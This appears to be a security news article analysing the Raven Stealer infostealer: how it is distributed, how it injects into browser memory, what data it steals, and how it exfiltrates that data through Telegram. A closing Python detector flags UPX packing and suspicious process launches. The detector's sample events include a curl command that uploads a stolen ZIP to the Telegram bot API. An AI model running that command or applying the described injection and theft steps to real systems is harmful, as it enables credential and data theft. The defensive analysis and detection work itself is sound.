Raven Stealer Unmasked: New MaaS Infostealer Plunders Data via Reflective Process Hollowing & Telegram Exfil
Amid a surge in malicious campaigns exploiting legitimate communication channels to evade traditional security measures, a new tool has drawn the attention of cybersecurity professionals—Raven Stealer. Emerging in July 2025, this information-stealing program has rapidly propagated via Telegram and GitHub, capturing interest not only for its capabilities but also for its blend of stealth, ease of use, and efficient data exfiltration methods.
Raven is currently a topic of intense discussion among threat analysts, as it illustrates how basic techniques can bypass antivirus solutions and browser-integrated protections with alarming efficiency.
Developed in Delphi and C++, Raven Stealer targets Windows systems. It harvests login credentials, payment information, and autocomplete data from Chromium-based browsers, including Chrome and Edge. Distributed via the Telegram channel “ZeroTrace” under the guise of an “educational tool,” the malware enables even inexperienced users to launch data theft using a built-in builder. Telegram also functions as the exfiltration channel, eliminating the need for a traditional command-and-control (C2) server.
The builds are compressed using UPX to hinder analysis and evade detection. Upon execution, the malware injects an encrypted module into browser processes using system calls such as NtWriteVirtualMemory, so the module never has to be written to disk. Credentials, cookies, and payment data are then extracted directly from the browser's memory, circumventing App-Bound Encryption protections.
Beyond browser data, Raven scans the system for cryptocurrency wallets, VPN clients, and installed games. All stolen information, including screenshots and text files containing sensitive data, is archived into a ZIP file bearing the username, then exfiltrated via curl.exe using the Telegram API.
The techniques employed in Raven align with multiple MITRE ATT&CK tactics: obfuscation, hidden windows, directory reconnaissance, and leveraging Telegram as a command channel. This architecture makes the tool both potent and discreet.
The ZeroTrace team has maintained the project since late April 2025, regularly publishing updates and source code via GitHub and Telegram. Raven is already being compared to their previous creation, Octalyn Stealer—suggesting a deliberate strategy of distributing lightweight yet highly effective infostealers.
As a defensive response, experts recommend monitoring for UPX-packed binaries, unusual browser launch flags, suspicious curl executions, and connections to the Telegram API. Behavioral analysis and system-call monitoring should also be implemented so that the in-memory injection into browser processes is detected rather than only the final upload.
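Two of the indicators listed above can be turned into simple checks, shown here as an added example that is not code from the article or from any vendor tool: a static test for the UPX0/UPX1 section names that UPX writes into a packed PE, and a scan of process-creation events for curl.exe reaching api.telegram.org and for browsers started by an unexpected parent (the parent allowlist and the sample events are constructed assumptions).

```python
"""Detection helpers for two Raven Stealer indicators: UPX packing and
suspicious process launches. Added example; events and allowlist are constructed."""
import json
import struct

BROWSERS = {"chrome.exe", "msedge.exe"}
# Assumption: parents from which an interactive browser launch is expected.
EXPECTED_BROWSER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe"}

def upx_section_names(pe: bytes) -> bool:
    """True if the PE section table contains UPX0/UPX1, the default UPX section names."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]   # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]    # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                             # section table start
    names = {pe[table + 40 * i:table + 40 * i + 8].rstrip(b"\0") for i in range(n_sections)}
    return bool(names & {b"UPX0", b"UPX1"})

def build_pe(section_names):
    """Constructed minimal PE (DOS stub + COFF header + section table) for testing only."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0)
    return dos + coff + b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)

def scan_process_events(lines):
    """Apply the process-level indicators to JSON lines with Sysmon-style field names."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        cmd = ev.get("CommandLine", "").lower()
        if image == "curl.exe" and "api.telegram.org" in cmd:
            hits.append((ev["ProcessId"], "curl_to_telegram_api"))
        if image in BROWSERS and parent not in EXPECTED_BROWSER_PARENTS:
            hits.append((ev["ProcessId"], "browser_spawned_by_unexpected_parent"))
    return hits

# Constructed sample events; not real telemetry.
SAMPLE_EVENTS = [
    json.dumps({"ProcessId": 1001, "Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"}),
    json.dumps({"ProcessId": 1002, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "ParentImage": r"C:\Users\u\AppData\Local\Temp\update.exe", "CommandLine": "chrome.exe"}),
    json.dumps({"ProcessId": 1003, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Users\u\AppData\Local\Temp\update.exe", "CommandLine": "curl.exe -F document=@u.zip https://api.telegram.org/bot<PLACEHOLDER>/sendDocument"}),
    json.dumps({"ProcessId": 1004, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "curl.exe https://example.com/"}),
]
```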
Raven Stealer stands as a stark reminder of how effortlessly technology can be weaponized. Beneath the guise of an “educational utility” lies a predatory instrument—one that does not educate, but corrodes—lowering the barrier to cybercrime and blurring the line between development and complicity.